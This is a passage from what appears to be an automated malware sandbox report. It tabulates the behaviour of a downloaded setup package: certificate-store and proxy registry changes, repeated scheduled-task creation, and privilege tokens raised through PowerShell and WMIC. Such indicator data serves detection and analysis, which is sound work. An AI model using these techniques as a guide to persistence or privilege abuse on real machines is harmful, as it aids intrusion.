| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b1167767-0000-0000-0000-d01200000000} | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" | C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\setup_NUyyEY7ilu.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
